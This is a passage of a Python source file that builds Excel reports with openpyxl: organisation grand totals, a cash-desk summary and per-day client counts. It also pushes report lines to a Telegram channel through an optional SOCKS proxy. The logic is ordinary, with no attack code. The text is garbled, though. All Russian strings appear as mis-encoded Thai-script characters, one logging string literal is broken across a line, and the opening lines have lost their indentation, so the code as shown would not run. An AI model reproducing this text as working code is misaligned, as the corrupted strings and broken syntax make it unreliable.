f'ะัะฟัะฐะฒะบะฐ ัะพะพะฑัะตะฝะธั {self.sms_report_list.index(line) + 1} ะธะท {len(self.sms_report_list)}')
bot.sendMessage(self.telegram_chanel_id, line)
if self.telegram_proxy_use:
logging.info(
f'{__name__}: {str(datetime.now())[:-7]}: ะ ะฐะทัะตะดะธะฝะตะฝะธะต ั ะฟัะพะบัะธ-ัะตัะฒะตัะพะผ {self.telegram_proxy_ip}...')
socks.setdefaultproxy()
socket.socket = socks.socksocket
    def save_organisation_total(self, itog_report):
        """
        Save the grand-total report ("ะัะพะณะพะฒัะน ะพััะตั") to an .xlsx workbook.

        ``itog_report`` maps a service name to a tuple read as
        ``(count, amount, group, supergroup)`` (indices 0..3 below), plus the
        special keys 'ะะฐัะฐ' and 'ะัะณะฐะฝะธะทะฐัะธั' -- assumption, TODO confirm
        against the code that builds the dict.

        :return: path of the saved file, or None when the computed total does
            not match the source system's "ะัะพะณะพ ะฟะพ ะพััะตัั" figure.
        """
        # Regroup the flat report into supergroup -> group -> [(name, count, amount)].
        organisation_total = {}
        for key in itog_report:
            organisation_total[itog_report[key][3]] = {}
        for key in itog_report:
            organisation_total[itog_report[key][3]][itog_report[key][2]] = []
        for key in itog_report:
            organisation_total[itog_report[key][3]][itog_report[key][2]].append((key, itog_report[key][0], itog_report[key][1]))
        # define the cell styles
        h1 = Font(name='Times New Roman',
                  size=18,
                  bold=True,
                  italic=False,
                  vertAlign=None,
                  underline='none',
                  strike=False,
                  color='FF000000')
        h2 = Font(name='Times New Roman',
                  size=14,
                  bold=True,
                  italic=False,
                  vertAlign=None,
                  underline='none',
                  strike=False,
                  color='FF000000')
        h3 = Font(name='Times New Roman',
                  size=11,
                  bold=True,
                  italic=False,
                  vertAlign=None,
                  underline='none',
                  strike=False,
                  color='FF000000')
        font = Font(name='Times New Roman',
                    size=9,
                    bold=False,
                    italic=False,
                    vertAlign=None,
                    underline='none',
                    strike=False,
                    color='FF000000')
        font_bold = Font(name='Times New Roman',
                         size=9,
                         bold=True,
                         italic=False,
                         vertAlign=None,
                         underline='none',
                         strike=False,
                         color='FF000000')
        fill = PatternFill(fill_type='solid',
                           start_color='c1c1c1',
                           end_color='c2c2c2')
        align_top = Alignment(horizontal='general',
                              vertical='top',
                              text_rotation=0,
                              wrap_text=False,
                              shrink_to_fit=False,
                              indent=0,
                              )
        align_bottom = Alignment(horizontal='general',
                                 vertical='bottom',
                                 text_rotation=0,
                                 wrap_text=False,
                                 shrink_to_fit=False,
                                 indent=0,
                                 )
        border = Border(left=Side(border_style='thin',
                                  color='FF000000'),
                        right=Side(border_style='thin',
                                   color='FF000000'),
                        top=Side(border_style='thin',
                                 color='FF000000'),
                        bottom=Side(border_style='thin',
                                    color='FF000000'),
                        diagonal=Side(border_style='thin',
                                      color='FF000000'),
                        diagonal_direction=0,
                        outline=Side(border_style='thin',
                                     color='FF000000'),
                        vertical=Side(border_style='thin',
                                      color='FF000000'),
                        horizontal=Side(border_style='thin',
                                        color='FF000000')
                        )
        border_top_bottom = Border(bottom=Side(border_style='thin', color='FF000000'),
                                   top=Side(border_style='thin', color='FF000000'),
                                   )
        border_right = Border(right=Side(border_style='thin', color='FF000000'))
        border_left = Border(left=Side(border_style='thin', color='FF000000'))
        border_top = Border(top=Side(border_style='thin', color='FF000000'))
        border_left_top = Border(top=Side(border_style='thin', color='FF000000'),
                                 left=Side(border_style='thin', color='FF000000'),
                                 )
        border_right_top = Border(top=Side(border_style='thin', color='FF000000'),
                                  right=Side(border_style='thin', color='FF000000'),
                                  )
        align_center = Alignment(horizontal='center',
                                 vertical='bottom',
                                 text_rotation=0,
                                 wrap_text=False,
                                 shrink_to_fit=False,
                                 indent=0)
        align_left = Alignment(horizontal='left',
                               vertical='bottom',
                               text_rotation=0,
                               wrap_text=False,
                               shrink_to_fit=False,
                               indent=0)
        number_format = 'General'
        protection = Protection(locked=True,
                                hidden=False)
        # 1-based column-letter lookup: column[1] == 'A'.
        column = ['', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M']
        # Current row is kept as a *string* on self so the nested helpers can mutate it.
        self.row = '0'

        def next_row():
            # Advance to the next row and return it (as a string for cell addressing).
            self.row = str(int(self.row) + 1)
            return self.row
        # workbook object
        wb = Workbook()
        # active worksheet
        ws = wb.active
        # sheet title
        # ws = wb.create_sheet('ะฟะตัะฒะฐั ัััะฐะฝะธัะฐ', 0)
        ws.title = 'ะัะพะณะพะฒัะน ะพััะตั'
        # heading font
        ws['C1'].font = h1
        # alignment
        ws['C1'].alignment = align_left
        # column widths (1/7 of a pixel measure)
        ws.column_dimensions['A'].width = 1 / 7 * 8
        ws.column_dimensions['B'].width = 1 / 7 * 8
        ws.column_dimensions['C'].width = 1 / 7 * 80
        ws.column_dimensions['D'].width = 1 / 7 * 8
        ws.column_dimensions['E'].width = 1 / 7 * 88
        ws.column_dimensions['F'].width = 1 / 7 * 8
        ws.column_dimensions['G'].width = 1 / 7 * 24
        ws.column_dimensions['H'].width = 1 / 7 * 8
        ws.column_dimensions['I'].width = 1 / 7 * 80
        ws.column_dimensions['J'].width = 1 / 7 * 8
        ws.column_dimensions['K'].width = 1 / 7 * 144
        ws.column_dimensions['L'].width = 1 / 7 * 144
        ws.column_dimensions['M'].width = 1 / 7 * 8
        # header cells
        # ws['A1'] = "Hello!"
        ws[column[3] + next_row()] = 'ะัะพะณะพะฒัะน ะพััะตั'
        ws.merge_cells(start_row=self.row, start_column=3, end_row=self.row, end_column=12)
        ws[column[1] + next_row()] = ''
        ws[column[3] + next_row()] = organisation_total['ะัะณะฐะฝะธะทะฐัะธั']['ะัะณะฐะฝะธะทะฐัะธั'][0][0]
        ws.merge_cells(start_row=self.row, start_column=3, end_row=self.row, end_column=12)
        ws[column[3] + self.row].font = font
        ws[column[3] + self.row].alignment = align_top
        ws[column[1] + next_row()] = ''
        # Period line ("from ... to ..."); the end date stored is exclusive.
        ws[column[3] + next_row()] = 'ะะฐ ะฟะตัะธะพะด ั:'
        ws[column[3] + self.row].font = font
        ws[column[3] + self.row].alignment = align_top
        ws[column[5] + self.row] = itog_report['ะะฐัะฐ'][0].strftime("%d.%m.%Y")
        ws[column[5] + self.row].font = font_bold
        ws[column[5] + self.row].alignment = align_top
        ws[column[7] + self.row] = 'ะะพ:'
        ws[column[7] + self.row].font = font
        ws[column[7] + self.row].alignment = align_top
        ws[column[9] + self.row] = (itog_report['ะะฐัะฐ'][1] - timedelta(1)).strftime("%d.%m.%Y")
        ws[column[9] + self.row].font = font_bold
        ws[column[9] + self.row].alignment = align_top

        # TABLE -- helpers that merge the three logical columns
        # (name B..I, count J..K, amount L..M) of the current row and style it.
        def merge_table():
            # Regular data row.
            ws.merge_cells(start_row=self.row, start_column=2, end_row=self.row, end_column=9)
            ws.merge_cells(start_row=self.row, start_column=10, end_row=self.row, end_column=11)
            ws.merge_cells(start_row=self.row, start_column=12, end_row=self.row, end_column=13)
            ws[column[2] + self.row].font = font
            ws[column[10] + self.row].font = font
            ws[column[12] + self.row].font = font
            ws[column[2] + self.row].alignment = align_top
            ws[column[10] + self.row].alignment = align_top
            ws[column[12] + self.row].alignment = align_top
            b = 2
            while b <= 13:
                ws[column[b] + self.row].border = border
                b += 1

        def merge_table_h3():
            # Group subtotal row (h3 font, side borders only).
            ws.merge_cells(start_row=self.row, start_column=2, end_row=self.row, end_column=9)
            ws.merge_cells(start_row=self.row, start_column=10, end_row=self.row, end_column=11)
            ws.merge_cells(start_row=self.row, start_column=12, end_row=self.row, end_column=13)
            ws[column[2] + self.row].font = h3
            ws[column[10] + self.row].font = h3
            ws[column[12] + self.row].font = h3
            ws[column[2] + self.row].alignment = align_top
            ws[column[10] + self.row].alignment = align_top
            ws[column[12] + self.row].alignment = align_top
            ws[column[2] + self.row].border = border_left
            ws[column[13] + self.row].border = border_right

        def merge_table_h2():
            # Supergroup subtotal row (h2 font, side borders only).
            ws.merge_cells(start_row=self.row, start_column=2, end_row=self.row, end_column=9)
            ws.merge_cells(start_row=self.row, start_column=10, end_row=self.row, end_column=11)
            ws.merge_cells(start_row=self.row, start_column=12, end_row=self.row, end_column=13)
            ws[column[2] + self.row].font = h2
            ws[column[10] + self.row].font = h2
            ws[column[12] + self.row].font = h2
            ws[column[2] + self.row].alignment = align_top
            ws[column[10] + self.row].alignment = align_top
            ws[column[12] + self.row].alignment = align_top
            ws[column[2] + self.row].border = border_left
            ws[column[13] + self.row].border = border_right

        def merge_width_h2():
            # Full-width supergroup heading row.
            ws.merge_cells(start_row=self.row, start_column=2, end_row=self.row, end_column=13)
            ws[column[2] + self.row].font = h2
            ws[column[2] + self.row].alignment = align_top
            b = 2
            while b <= 13:
                if b == 2:
                    ws[column[b] + self.row].border = border_left_top
                elif b == 13:
                    ws[column[b] + self.row].border = border_right_top
                else:
                    ws[column[b] + self.row].border = border_top
                b += 1

        def merge_width_h3():
            # Full-width group heading row (no top border on middle cells).
            ws.merge_cells(start_row=self.row, start_column=2, end_row=self.row, end_column=13)
            ws[column[2] + self.row].font = h3
            ws[column[2] + self.row].alignment = align_top
            b = 2
            while b <= 13:
                if b == 2:
                    ws[column[b] + self.row].border = border_left
                elif b == 13:
                    ws[column[b] + self.row].border = border_right
                b += 1
        # Table header row.
        ws[column[2] + next_row()] = 'ะะฐะทะฒะฐะฝะธะต'
        ws[column[10] + self.row] = 'ะะพะปะธัะตััะฒะพ'
        ws[column[12] + self.row] = 'ะกัะผะผะฐ'
        merge_table()
        ws[column[2] + self.row].font = h3
        ws[column[10] + self.row].font = h3
        ws[column[12] + self.row].font = h3
        ws[column[2] + self.row].alignment = align_top
        ws[column[10] + self.row].alignment = align_top
        ws[column[12] + self.row].alignment = align_top
        # Fixed output order of the supergroups.
        groups = [
            'ะะตะฟะพะทะธั',
            'ะะฐััั',
            'ะฃัะปัะณะธ',
            'ะขะพะฒะฐัั',
            'ะะปะฐัะฝัะต ะทะพะฝั',
        ]
        all_count = 0
        all_sum = 0
        try:
            for gr in groups:
                ws[column[2] + next_row()] = gr
                merge_width_h2()
                group_count = 0
                group_sum = 0
                organisation_total_groups = organisation_total.get(gr)
                if not organisation_total_groups:
                    # Supergroup absent in this period -- heading stays, no rows.
                    continue
                for group in organisation_total_groups:
                    ws[column[2] + next_row()] = group
                    merge_width_h3()
                    service_count = 0
                    service_sum = 0
                    servises = organisation_total_groups.get(group, [])
                    if not servises:
                        continue
                    for service in servises:
                        try:
                            service_count += service[1]
                            service_sum += service[2]
                        except TypeError:
                            # count/amount may be None or non-numeric -- skip from subtotal.
                            pass
                        ws[column[2] + next_row()] = service[0]
                        ws[column[10] + self.row] = service[1]
                        ws[column[12] + self.row] = service[2]
                        ws[column[12] + self.row].number_format = '#,##0.00 โฝ'
                        merge_table()
                    # Group subtotal row.
                    ws[column[10] + next_row()] = service_count
                    ws[column[12] + self.row] = service_sum
                    ws[column[12] + self.row].number_format = '#,##0.00 โฝ'
                    merge_table_h3()
                    group_count += service_count
                    group_sum += service_sum
                # Supergroup subtotal row.
                ws[column[10] + next_row()] = group_count
                ws[column[12] + self.row] = group_sum
                ws[column[12] + self.row].number_format = '#,##0.00 โฝ'
                merge_table_h2()
                all_count += group_count
                all_sum += group_sum
                group_count = 0
                group_sum = 0
        except KeyError:
            pass
        # Cross-check our computed total against the source system's total row.
        bars_total_sum = organisation_total["ะัะพะณะพ ะฟะพ ะพััะตัั"][""][0]
        if all_sum == bars_total_sum[2]:
            ws[column[2] + next_row()] = bars_total_sum[0]
            ws[column[10] + self.row] = bars_total_sum[1]
            ws[column[12] + self.row] = bars_total_sum[2]
            self.total_report_sum = all_sum
        else:
            # Mismatch: report the discrepancy to the user and abort the save.
            error_code = f'ะัะธะฑะบะฐ: ะัะพะณะพะฒัะต ััะผะผั ะฝะต ัะพะฒะฟะฐะดะฐัั.'
            error_message = f'"ะัะพะณะพ ะฟะพ ะพััะตัั" ะธะท ะะฐััะฐ ({bars_total_sum[2]})' \
                            f' ะฝะต ัะพะฒะฟะฐะดะฐะตั ั ะธัะพะณะพะฒะพะน ััะผะผะพะน ะฟะพ ัะพัะผะธััะตะผัะผ ัััะพะบะฐะผ ({all_sum}).'
            logging.error(f'{__name__}: {str(datetime.now())[:-7]}: {error_code} {error_message}')
            self.show_dialog(error_code, error_message)
            return None
        ws[column[12] + self.row].number_format = '#,##0.00 โฝ'
        merge_table_h2()
        ws[column[2] + self.row].alignment = align_bottom
        ws[column[10] + self.row].alignment = align_bottom
        ws[column[12] + self.row].alignment = align_bottom
        b = 2
        while b <= 13:
            ws[column[b] + self.row].border = border_top_bottom
            b += 1
        end_line = int(self.row)
        # fill background for the (hard-coded row 6) table header
        i = 2
        while i <= 13:
            ws[column[i] + '6'].fill = fill
            i += 1
        # borders
        # ws['A3'].border = border
        # set the first row height manually
        rd = ws.row_dimensions[1]
        rd.height = 21.75
        # enlarge all remaining rows
        max_row = ws.max_row
        i = 2
        while i <= max_row:
            rd = ws.row_dimensions[i]
            rd.height = 18
            i += 1
        # special row heights (spacers and the total row)
        ws.row_dimensions[2].height = 5.25
        ws.row_dimensions[4].height = 6.75
        ws.row_dimensions[end_line].height = 30.75
        # column alignment
        for cellObj in ws['A2:A5']:
            for cell in cellObj:
                ws[cell.coordinate].alignment = align_left
        # auto-sizing of cells (kept disabled)
        # https://stackoverflow.com/questions/13197574/openpyxl-adjust-column-width-size
        # dims = {}
        # for row in ws.rows:
        #     for cell in row:
        #         if cell.value:
        #             dims[cell.column] = max((dims.get(cell.column, 0), len(cell.value)))
        # for col, value in dims.items():
        #     # value * coefficient
        #     ws.column_dimensions[col].width = value * 1.5
        # build the target file name from the report period and save
        if itog_report['ะะฐัะฐ'][0] == itog_report["ะะฐัะฐ"][1] - timedelta(1):
            date_ = datetime.strftime(itog_report["ะะฐัะฐ"][0], "%Y-%m-%d")
        else:
            date_ = f'{datetime.strftime(itog_report["ะะฐัะฐ"][0], "%Y-%m-%d")} - ' \
                    f'{datetime.strftime(itog_report["ะะฐัะฐ"][1] - timedelta(1), "%Y-%m-%d")}'
        path = self.local_folder + self.path + date_ + \
               f' ะัะพะณะพะฒัะน ะพััะตั ะฟะพ {organisation_total["ะัะณะฐะฝะธะทะฐัะธั"]["ะัะณะฐะฝะธะทะฐัะธั"][0][0]} ' + ".xlsx"
        logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพั
ัะฐะฝะตะฝะธะต ะัะพะณะพะฒะพะณะพ ะพััะตัะฐ '
                     f'ะฟะพ {organisation_total["ะัะณะฐะฝะธะทะฐัะธั"]["ะัะณะฐะฝะธะทะฐัะธั"][0][0]} ะฒ {path}')
        path = self.create_path(path)
        self.save_file(path, wb)
        return path
    def save_cashdesk_report(self, cashdesk_report):
        """
        Save the cash-desk summary report ("ะกัะผะผะพะฒะพะน ะพััะตั") to an .xlsx workbook.

        ``cashdesk_report`` maps a section name to rows that look like
        ``(label, total, cash, cashless, from_account, coins, lsi_total)``
        (indices 0..6 below), plus the special keys 'ะะฐัะฐ' and 'ะัะณะฐะฝะธะทะฐัะธั' --
        assumption, TODO confirm against the code that builds the dict.

        :return: path of the saved file.
        """
        # define the cell styles
        h1 = Font(name='Times New Roman',
                  size=18,
                  bold=True,
                  italic=False,
                  vertAlign=None,
                  underline='none',
                  strike=False,
                  color='FF000000')
        h2 = Font(name='Times New Roman',
                  size=14,
                  bold=True,
                  italic=False,
                  vertAlign=None,
                  underline='none',
                  strike=False,
                  color='FF000000')
        h3 = Font(name='Times New Roman',
                  size=10,
                  bold=True,
                  italic=False,
                  vertAlign=None,
                  underline='none',
                  strike=False,
                  color='FF000000')
        font = Font(name='Times New Roman',
                    size=9,
                    bold=False,
                    italic=False,
                    vertAlign=None,
                    underline='none',
                    strike=False,
                    color='FF000000')
        font_bold = Font(name='Times New Roman',
                         size=9,
                         bold=True,
                         italic=False,
                         vertAlign=None,
                         underline='none',
                         strike=False,
                         color='FF000000')
        font_red = Font(name='Times New Roman',
                        size=9,
                        bold=True,
                        italic=False,
                        vertAlign=None,
                        underline='none',
                        strike=False,
                        color='FFFF0000')
        fill = PatternFill(fill_type='solid',
                           start_color='c1c1c1',
                           end_color='c2c2c2')
        align_top = Alignment(horizontal='general',
                              vertical='top',
                              text_rotation=0,
                              wrap_text=False,
                              shrink_to_fit=False,
                              indent=0,
                              )
        align_bottom = Alignment(horizontal='general',
                                 vertical='bottom',
                                 text_rotation=0,
                                 wrap_text=False,
                                 shrink_to_fit=False,
                                 indent=0,
                                 )
        border = Border(left=Side(border_style='thin',
                                  color='FF000000'),
                        right=Side(border_style='thin',
                                   color='FF000000'),
                        top=Side(border_style='thin',
                                 color='FF000000'),
                        bottom=Side(border_style='thin',
                                    color='FF000000'),
                        diagonal=Side(border_style='thin',
                                      color='FF000000'),
                        diagonal_direction=0,
                        outline=Side(border_style='thin',
                                     color='FF000000'),
                        vertical=Side(border_style='thin',
                                      color='FF000000'),
                        horizontal=Side(border_style='thin',
                                        color='FF000000')
                        )
        border_top_bottom = Border(bottom=Side(border_style='thin', color='FF000000'),
                                   top=Side(border_style='thin', color='FF000000'),
                                   )
        border_right = Border(right=Side(border_style='thin', color='FF000000'))
        border_left = Border(left=Side(border_style='thin', color='FF000000'))
        border_top = Border(top=Side(border_style='thin', color='FF000000'))
        border_left_top = Border(top=Side(border_style='thin', color='FF000000'),
                                 left=Side(border_style='thin', color='FF000000'),
                                 )
        border_right_top = Border(top=Side(border_style='thin', color='FF000000'),
                                  right=Side(border_style='thin', color='FF000000'),
                                  )
        align_center = Alignment(horizontal='center',
                                 vertical='bottom',
                                 text_rotation=0,
                                 wrap_text=False,
                                 shrink_to_fit=False,
                                 indent=0)
        align_left = Alignment(horizontal='left',
                               vertical='bottom',
                               text_rotation=0,
                               wrap_text=False,
                               shrink_to_fit=False,
                               indent=0)
        number_format = 'General'
        protection = Protection(locked=True,
                                hidden=False)
        # 1-based column-letter lookup: column[1] == 'A'.
        column = ['', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']
        # Current row kept as a string on self so nested helpers can mutate it.
        self.row = '0'

        def next_row():
            # Advance to the next row and return it (as a string for cell addressing).
            self.row = str(int(self.row) + 1)
            return self.row
        # workbook object
        wb = Workbook()
        # active worksheet
        ws = wb.active
        # sheet title
        # ws = wb.create_sheet('ะฟะตัะฒะฐั ัััะฐะฝะธัะฐ', 0)
        ws.title = 'ะกัะผะผะพะฒะพะน ะพััะตั ะฟะพ ัะตะบะพะฒะพะน ะปะตะฝัะต'
        # heading font
        ws['A1'].font = h1
        # alignment
        ws['A1'].alignment = align_left
        # column widths (1/7 of a pixel measure)
        ws.column_dimensions['A'].width = 1 / 7 * 124
        ws.column_dimensions['B'].width = 1 / 7 * 88
        ws.column_dimensions['C'].width = 1 / 7 * 28
        ws.column_dimensions['D'].width = 1 / 7 * 24
        ws.column_dimensions['E'].width = 1 / 7 * 32
        ws.column_dimensions['F'].width = 1 / 7 * 1
        ws.column_dimensions['G'].width = 1 / 7 * 79
        ws.column_dimensions['H'].width = 1 / 7 * 3
        ws.column_dimensions['I'].width = 1 / 7 * 5
        ws.column_dimensions['J'].width = 1 / 7 * 96
        ws.column_dimensions['K'].width = 1 / 7 * 88
        ws.column_dimensions['L'].width = 1 / 7 * 8
        ws.column_dimensions['M'].width = 1 / 7 * 80
        ws.column_dimensions['N'].width = 1 / 7 * 96
        # header cells
        # ws['A1'] = "Hello!"
        ws[column[1] + next_row()] = 'ะกัะผะผะพะฒะพะน ะพััะตั ะฟะพ ัะตะบะพะฒะพะน ะปะตะฝัะต'
        ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=len(column)-1)
        # heading font
        ws[column[1] + self.row].font = h1
        # alignment
        ws[column[1] + self.row].alignment = align_left
        # title row height
        ws.row_dimensions[1].height = 24
        ws[column[1] + next_row()] = f'{cashdesk_report["ะัะณะฐะฝะธะทะฐัะธั"][0][0]}'
        ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=len(column) - 1)
        ws[column[1] + self.row].font = font
        ws[column[1] + self.row].alignment = align_top
        # Period line ("from ... to ..."); the end date stored is exclusive.
        ws[column[1] + next_row()] = 'ะะฐ ะฟะตัะธะพะด ั:'
        ws[column[1] + self.row].font = font
        ws[column[1] + self.row].alignment = align_top
        ws[column[2] + self.row] = cashdesk_report['ะะฐัะฐ'][0][0].strftime("%d.%m.%Y")
        ws.merge_cells(start_row=self.row, start_column=2, end_row=self.row, end_column=3)
        ws[column[2] + self.row].font = font_bold
        ws[column[2] + self.row].alignment = align_top
        ws[column[4] + self.row] = 'ะฟะพ'
        ws[column[4] + self.row].font = font
        ws[column[4] + self.row].alignment = align_top
        ws[column[5] + self.row] = (cashdesk_report['ะะฐัะฐ'][0][1] - timedelta(1)).strftime("%d.%m.%Y")
        ws.merge_cells(start_row=self.row, start_column=5, end_row=self.row, end_column=7)
        ws[column[5] + self.row].font = font_bold
        ws[column[5] + self.row].alignment = align_top

        # TABLE -- helpers that merge/style the seven logical columns of the
        # current row; they differ only in the font used.
        def merge_table():
            # Regular data row (normal font).
            ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=2)
            ws.merge_cells(start_row=self.row, start_column=3, end_row=self.row, end_column=6)
            ws.merge_cells(start_row=self.row, start_column=7, end_row=self.row, end_column=9)
            ws.merge_cells(start_row=self.row, start_column=11, end_row=self.row, end_column=12)
            ws[column[1] + self.row].font = font
            ws[column[3] + self.row].font = font
            ws[column[7] + self.row].font = font
            ws[column[10] + self.row].font = font
            ws[column[11] + self.row].font = font
            ws[column[13] + self.row].font = font
            ws[column[14] + self.row].font = font
            ws[column[1] + self.row].alignment = align_top
            ws[column[3] + self.row].alignment = align_top
            ws[column[7] + self.row].alignment = align_top
            ws[column[10] + self.row].alignment = align_top
            ws[column[11] + self.row].alignment = align_top
            ws[column[13] + self.row].alignment = align_top
            ws[column[14] + self.row].alignment = align_top
            ws[column[3] + self.row].number_format = '#,##0.00 โฝ'
            ws[column[7] + self.row].number_format = '#,##0.00 โฝ'
            ws[column[10] + self.row].number_format = '#,##0.00 โฝ'
            ws[column[11] + self.row].number_format = '#,##0.00 โฝ'
            ws[column[13] + self.row].number_format = '#,##0.00 โฝ'
            ws[column[14] + self.row].number_format = '#,##0.00 โฝ'
            b = 1
            while b < len(column):
                ws[column[b] + self.row].border = border
                b += 1

        def merge_table_h3():
            # Header / grand-total row (bold h3 font).
            ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=2)
            ws.merge_cells(start_row=self.row, start_column=3, end_row=self.row, end_column=6)
            ws.merge_cells(start_row=self.row, start_column=7, end_row=self.row, end_column=9)
            ws.merge_cells(start_row=self.row, start_column=11, end_row=self.row, end_column=12)
            ws[column[1] + self.row].font = h3
            ws[column[3] + self.row].font = h3
            ws[column[7] + self.row].font = h3
            ws[column[10] + self.row].font = h3
            ws[column[11] + self.row].font = h3
            ws[column[13] + self.row].font = h3
            ws[column[14] + self.row].font = h3
            ws[column[1] + self.row].alignment = align_top
            ws[column[3] + self.row].alignment = align_top
            ws[column[7] + self.row].alignment = align_top
            ws[column[10] + self.row].alignment = align_top
            ws[column[11] + self.row].alignment = align_top
            ws[column[13] + self.row].alignment = align_top
            ws[column[14] + self.row].alignment = align_top
            ws[column[3] + self.row].number_format = '#,##0.00 โฝ'
            ws[column[7] + self.row].number_format = '#,##0.00 โฝ'
            ws[column[10] + self.row].number_format = '#,##0.00 โฝ'
            ws[column[11] + self.row].number_format = '#,##0.00 โฝ'
            ws[column[13] + self.row].number_format = '#,##0.00 โฝ'
            ws[column[14] + self.row].number_format = '#,##0.00 โฝ'
            b = 1
            while b < len(column):
                ws[column[b] + self.row].border = border
                b += 1

        def merge_table_red():
            # Per-section subtotal row (red bold font).
            ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=2)
            ws.merge_cells(start_row=self.row, start_column=3, end_row=self.row, end_column=6)
            ws.merge_cells(start_row=self.row, start_column=7, end_row=self.row, end_column=9)
            ws.merge_cells(start_row=self.row, start_column=11, end_row=self.row, end_column=12)
            ws[column[1] + self.row].font = font_red
            ws[column[3] + self.row].font = font_red
            ws[column[7] + self.row].font = font_red
            ws[column[10] + self.row].font = font_red
            ws[column[11] + self.row].font = font_red
            ws[column[13] + self.row].font = font_red
            ws[column[14] + self.row].font = font_red
            ws[column[1] + self.row].alignment = align_top
            ws[column[3] + self.row].alignment = align_top
            ws[column[7] + self.row].alignment = align_top
            ws[column[10] + self.row].alignment = align_top
            ws[column[11] + self.row].alignment = align_top
            ws[column[13] + self.row].alignment = align_top
            ws[column[14] + self.row].alignment = align_top
            ws[column[3] + self.row].number_format = '#,##0.00 โฝ'
            ws[column[7] + self.row].number_format = '#,##0.00 โฝ'
            ws[column[10] + self.row].number_format = '#,##0.00 โฝ'
            ws[column[11] + self.row].number_format = '#,##0.00 โฝ'
            ws[column[13] + self.row].number_format = '#,##0.00 โฝ'
            ws[column[14] + self.row].number_format = '#,##0.00 โฝ'
            b = 1
            while b < len(column):
                ws[column[b] + self.row].border = border
                b += 1

        def merge_width_red():
            # Full-width section heading row (red bold font).
            ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=len(column) - 1)
            ws[column[1] + self.row].font = font_red
            ws[column[1] + self.row].alignment = align_top
            b = 1
            while b < len(column):
                if b == 1:
                    ws[column[b] + self.row].border = border_left
                elif b == len(column) - 1:
                    ws[column[b] + self.row].border = border_right
                else:
                    ws[column[b] + self.row].border = border
                b += 1
        # Table header row.
        ws[column[1] + next_row()] = 'ะะฐััะฐ โ'
        ws[column[3] + self.row] = 'ะกัะผะผะฐ'
        ws[column[7] + self.row] = 'ะะฐะปะธัะฝัะผะธ'
        ws[column[10] + self.row] = 'ะะตะทะฝะฐะปะธัะฝัะผะธ'
        ws[column[11] + self.row] = 'ะกะพ ััะตัะฐ'
        ws[column[13] + self.row] = 'ะะพะฝััะฐะผะธ'
        ws[column[14] + self.row] = 'LSI'
        merge_table_h3()
        # fill background for the header row
        b = 1
        while b < len(column):
            ws[column[b] + self.row].fill = fill
            b += 1
        # Body: one heading per section, then its rows; 'ะะฐัะฐ'/'ะัะณะฐะฝะธะทะฐัะธั'
        # are metadata keys and 'ะัะพะณะพ' is emitted via its own rows below.
        for typpe in cashdesk_report:
            if typpe != 'ะะฐัะฐ' and typpe != 'ะัะณะฐะฝะธะทะฐัะธั':
                if typpe != 'ะัะพะณะพ':
                    ws[column[1] + next_row()] = typpe
                    merge_width_red()
                for line in cashdesk_report[typpe]:
                    ws[column[1] + next_row()] = line[0]
                    ws[column[3] + self.row] = line[1]
                    ws[column[7] + self.row] = line[2]
                    ws[column[10] + self.row] = line[3]
                    ws[column[11] + self.row] = line[4]
                    ws[column[13] + self.row] = line[5]
                    # LSI column: line[6] minus the cashless part -- assumption
                    # about the meaning, TODO confirm with the data producer.
                    ws[column[14] + self.row] = line[6]-line[3]
                    if line[0] == 'ะัะพะณะพ':
                        merge_table_red()
                    elif line[0] == 'ะัะพะณะพ ะฟะพ ะพััะตัั':
                        merge_table_h3()
                    else:
                        merge_table()
        # enlarge all row heights
        max_row = ws.max_row
        i = 2
        while i <= max_row:
            rd = ws.row_dimensions[i]
            rd.height = 18
            i += 1
        # build the target file name from the report period and save
        if cashdesk_report['ะะฐัะฐ'][0][0] == cashdesk_report["ะะฐัะฐ"][0][1] - timedelta(1):
            date_ = datetime.strftime(cashdesk_report["ะะฐัะฐ"][0][0], "%Y-%m-%d")
        else:
            date_ = f'{datetime.strftime(cashdesk_report["ะะฐัะฐ"][0][0], "%Y-%m-%d")} - ' \
                    f'{datetime.strftime(cashdesk_report["ะะฐัะฐ"][0][1] - timedelta(1), "%Y-%m-%d")}'
        path = self.local_folder + self.path + date_ + f' ะกัะผะผะพะฒะพะน ะพััะตั ะฟะพ {cashdesk_report["ะัะณะฐะฝะธะทะฐัะธั"][0][0]}' + ".xlsx"
        logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพั
ัะฐะฝะตะฝะธะต ะกัะผะผะพะฒะพะณะพ ะพััะตัะฐ '
                     f'ะฟะพ {cashdesk_report["ะัะณะฐะฝะธะทะฐัะธั"][0][0]} ะฒ {path}')
        path = self.create_path(path)
        self.save_file(path, wb)
        return path
    def save_client_count_totals(self, client_count_totals_org):
        """
        Save the per-day client count report to an .xlsx workbook.

        ``client_count_totals_org`` is a list whose first element looks like
        ``(organisation_name, flag)``, whose middle elements are
        ``(date, count)`` pairs and whose last element is the totals row --
        assumption, TODO confirm against the code that builds the list.

        :return: path of the saved file.
        """
        # define the cell styles
        h1 = Font(name='Times New Roman',
                  size=18,
                  bold=True,
                  italic=False,
                  vertAlign=None,
                  underline='none',
                  strike=False,
                  color='FF000000')
        font = Font(name='Times New Roman',
                    size=9,
                    bold=False,
                    italic=False,
                    vertAlign=None,
                    underline='none',
                    strike=False,
                    color='FF000000')
        font_bold = Font(name='Times New Roman',
                         size=9,
                         bold=True,
                         italic=False,
                         vertAlign=None,
                         underline='none',
                         strike=False,
                         color='FF000000')
        fill = PatternFill(fill_type='solid',
                           start_color='c1c1c1',
                           end_color='c2c2c2')
        align_top = Alignment(horizontal='general',
                              vertical='top',
                              text_rotation=0,
                              wrap_text=False,
                              shrink_to_fit=False,
                              indent=0,
                              )
        border = Border(left=Side(border_style='thin',
                                  color='FF000000'),
                        right=Side(border_style='thin',
                                   color='FF000000'),
                        top=Side(border_style='thin',
                                 color='FF000000'),
                        bottom=Side(border_style='thin',
                                    color='FF000000'),
                        diagonal=Side(border_style='thin',
                                      color='FF000000'),
                        diagonal_direction=0,
